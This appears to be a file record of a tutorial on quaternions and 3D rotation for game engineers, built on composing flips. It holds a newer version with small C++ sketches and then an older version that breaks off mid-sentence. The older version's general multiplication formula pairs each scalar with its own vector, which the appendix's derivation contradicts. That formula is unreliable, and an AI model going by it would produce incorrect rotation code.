\nThe fact that stem:[q] and stem:[\u2013q] represent the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and a vector stem:[\\vec{v}], we are ready to calculate the result of the flip, stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to the flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axes of the flips stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)], then from our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{u},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}]. If you are not sure what\u2019s going on here, go back to \u201cFlip Composition\u201d and read the proof.)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called the identity quaternion, meaning no rotation at all. 
You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see that for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternions, the idea of the inverse quaternion is that if you apply a rotation, then apply its inverse, the result should be no rotation at all. The same holds if you apply an inverse rotation and then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], we have stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of a flip. You can try to extend this proof to general unit quaternions. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to the previous result of flipping a vector, stem:[{q_v'}{q_a}={q_a}{q_v}]. Applying the inverse flip of stem:[q_a] on both sides, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of a flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is where the \u201csandwich\u201d multiplication form comes from, but only in the form of a flip. We will prove that our result holds the same for any rotation in the next section.\n\nIn code, the flip of a vector looks like this, again continuing the toy C++ sketch (the `inverse` below is only valid for unit quaternions):\n\n
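[source,cpp]\n----\n\/\/ Continuing the sketch. For a unit quaternion the inverse is just\n\/\/ the conjugate: negate the vector part.\nQuat inverse(Quat q) { return { -q.x, -q.y, -q.z, q.w }; }\n\n\/\/ Flip vector v along unit axis a: (a,0) * (v,0) * (a,0)^-1.\n\/\/ The w of the result comes out as 0, so we drop it.\nVec3 flip(Vec3 a, Vec3 v)\n{\n    const Quat qa{ a.x, a.y, a.z, 0.0f };\n    const Quat qv{ v.x, v.y, v.z, 0.0f };   \/\/ embed v as a flip quaternion\n    const Quat r  = mul(mul(qa, qv), inverse(qa));\n    return { r.x, r.y, r.z };\n}\n----\n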
\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip to stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove:\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we have fully explained how to rotate a vector using a quaternion.\n\n=== Rotation Composition\n\nGiven rotations stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate a vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as applying the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric terms. We have a combined rotation stem:[q={q_2}{q_1}] that rotates stem:[q_1] first then rotates stem:[q_2]. If we want to undo this rotation, which means applying the inverse stem:[q^{-1}=({q_2}{q_1})^{-1}], we need to undo stem:[q_2] first then undo stem:[q_1]; that is effectively stem:[q_1^{-1}q_2^{-1}].\n\nWhat does it really mean to combine 2 rotations? Can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually can.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis; that is, stem:[\\vec{c}\u00b7\\vec{v_1}=0] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], so we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find the other two axes: rotating stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotating stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. 
The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this:\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flips stem:[q_a] and stem:[q_b], which tells us the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, the blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_2}]; stem:[\\vec{c}] is perpendicular to that plane. \nThe orange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}]; the resulting rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of a quaternion stem:[q=(x,y,z,w)], the vector form of a quaternion stem:[q=(\\vec{v},w)], the unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about the negation of a quaternion stem:[\u2013q] and its double-cover property; the inverse of a quaternion stem:[q^{-1}]; and the identity quaternion stem:[I=(\\vec{0},1)].\n\nWe used quaternions to represent flips stem:[q_a=(\\vec{a},0)], and derived the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how a quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotations get composed by stem:[q={q_2}{q_1}].\n\nWe briefly touched on quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\nTo close Part 1, here is a compact C++ sketch, building on the earlier toy types, that rotates a vector by stem:[q\\vec{v}q^{-1}] and composes two rotations as stem:[{q_2}{q_1}]:\n\n
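[source,cpp]\n----\n\/\/ Continuing the sketch: rotate v by a unit quaternion q (v' = q v q^-1).\nVec3 rotate(Quat q, Vec3 v)\n{\n    const Quat qv{ v.x, v.y, v.z, 0.0f };\n    const Quat r  = mul(mul(q, qv), inverse(q));\n    return { r.x, r.y, r.z };\n}\n\n\/\/ Usage: \"rotate by q1, then by q2\" is the single rotation mul(q2, q1).\n\/\/ Two 90-degree turns along Z equal one 180-degree turn:\n\/\/   Quat q90  = fromAxisAngle({ 0.f, 0.f, 1.f }, 1.5707963f);\n\/\/   Quat q180 = mul(q90, q90);\n\/\/   Vec3 r    = rotate(q180, { 1.f, 0.f, 0.f });  \/\/ roughly (-1, 0, 0)\n----\n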
\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternions. It is a bit calculation heavy and is more for fun. Feel free to skip it.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is, if we define the flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can prove what the general quaternion multiplication stem:[{q_2}{q_1}=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we chose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotating stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}], we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotating stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}], we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + 
sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}\\vec{v_2}))\n\\end{align*}\n++++ \nwhich is exactly the general quaternion multiplication stem:[{q_2}{q_1}=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})] applied to our two rotations.\n\n","old_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. I will start with a special rotation operation: flip, and use that to visualize quaternion in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engine versus rotation matrix and Euler angle.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nQuaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expected from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. 
But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. 
If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion 